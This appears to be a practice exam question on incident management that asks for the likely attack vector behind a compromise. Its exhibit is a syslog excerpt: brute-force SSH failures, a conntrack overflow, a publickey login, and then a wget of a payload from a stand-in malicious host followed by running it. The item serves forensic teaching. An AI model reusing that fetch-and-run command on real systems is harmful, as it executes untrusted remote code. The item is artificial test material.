1
Incident Management
hard
Based on the exhibit, what is the MOST likely attack vector that led to the compromise?
Exhibit
Refer to the exhibit. Exhibit: Syslog output from a compromised server: Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2 Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2 ... (repeated 100 times) Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet. Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2 Mar 15 10:25:10 server1 bash: sudo: whoami Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh Mar 15 10:25:30 server1 bash: bash payload.sh